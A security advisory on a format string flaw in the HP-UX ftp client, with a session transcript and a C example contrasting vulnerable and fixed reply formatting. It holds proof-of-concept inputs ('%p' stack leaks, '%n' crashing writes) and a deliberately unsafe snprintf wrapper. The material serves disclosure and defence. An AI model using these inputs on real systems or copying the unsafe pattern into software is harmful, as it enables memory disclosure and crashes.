[ SOURCE: http://www.secureroot.com/security/advisories/9790370532.html ]

HP/UX FTP format string vulnerability

A format string vulnerability exists in ftp. This vulnerability was discussed with HP labs.

$ uname -a
HP-UX hpotac8 B.11.00 A 9000/785 2004901631 licence pour deux utilisateurs
$ ftp localhost
Connected to localhost.
220 localhost FTP server (Version 1.1.214.6 Wed Feb 9 08:03:34 GMT 2000) ready.
Name (localhost:zorgon): zorgon
331 Password required for zorgon.
Password:
230 User zorgon logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> site exec %p %p %p %p
200-40008f10 00000003 00000002 00000001
200 (end of '40008f10 00000003 00000002 00000001')
ftp> site exec %n %n %n %n
Bus error(coredump)
$

And the 'SITE' command is also vulnerable ...

ftp> site %p %p %p %p
500 'SITE 40008F0C 00000002 00000002 00000001': command not understood.
ftp> site %n %n %n %n
Bus error(coredump)
$ file core
core: fichier de vidage de la memoire de'ftp' - recu SIGBUS

The format strings are not handled correctly in the ftp client: the user-supplied text is passed through as a format string, so %p prints values from the client's own stack and %n makes the client write to memory and crash. When HP labs fix the problem in the client, the result will be:

ftp> site exec %n %n %n %n
---> SITE exec %n %n %n %n
200-%n %n %n %n
200 (end of '%n %n %n %n')
ftp>

So in this case the ftpd server will not process the format strings; they are sent and echoed back as literal text. The fix will be made in the next release of the ftp client.

-------------------------------------
zorgon
http://www.nightbird.free.fr
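The pattern behind the advisory, and the shape of the fix it describes, as an added illustration in C. This is not HP's ftp source (which the advisory does not show) but a constructed client-side reply formatter: one version uses the caller-controlled text as the printf format string, the other passes a fixed "%s" format so that "%n %n %n %n" is copied verbatim, which is exactly the behaviour the fixed client is expected to produce. A small review-time check that spots conversion directives in data that should never reach a format argument is included. The function names, the REPLY_MAX size and the sample strings are assumptions for the example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define REPLY_MAX 256   /* assumed buffer size for the example */

/* Vulnerable pattern: the text is used AS the format string. With "%p %p"
 * snprintf reads stack slots it was never given (the "200-40008f10 ..." line
 * in the advisory); with "%n" it writes to memory, hence the SIGBUS core.
 * The call is made through a function pointer only so the compiler does not
 * reject the example; a direct snprintf(out, outsz, text) is what
 * gcc -Wformat-security flags. Only ever call this with text containing no '%'. */
int format_reply_unsafe(char *out, size_t outsz, const char *text)
{
    int (*fmt)(char *, size_t, const char *, ...) = snprintf;
    return fmt(out, outsz, text);           /* format string is untrusted data */
}

/* Hardened pattern: a fixed format; the text is only ever a %s argument, so
 * every '%' in it is copied literally and no directive is interpreted. */
int format_reply_safe(char *out, size_t outsz, const char *text)
{
    return snprintf(out, outsz, "%s", text);
}

/* Defensive check for code review, fuzz harnesses or input validation: does a
 * string contain a conversion directive, i.e. a '%' not escaped as "%%"? */
bool has_format_directive(const char *s)
{
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {                  /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        return true;
    }
    return false;
}

int main(void)
{
    char buf[REPLY_MAX];
    const char *sample = "%n %n %n %n";     /* constructed, mirrors the advisory */

    format_reply_safe(buf, sizeof buf, sample);
    printf("safe reply : %s\n", buf);       /* prints the literal %n %n %n %n */
    printf("directives : %s\n", has_format_directive(sample) ? "yes" : "no");
    return 0;
}
```

The safe variant is the whole fix: once the untrusted text is an argument rather than the format, the client echoes it unchanged and the server, as the advisory shows, simply treats it as an unknown or literal SITE argument.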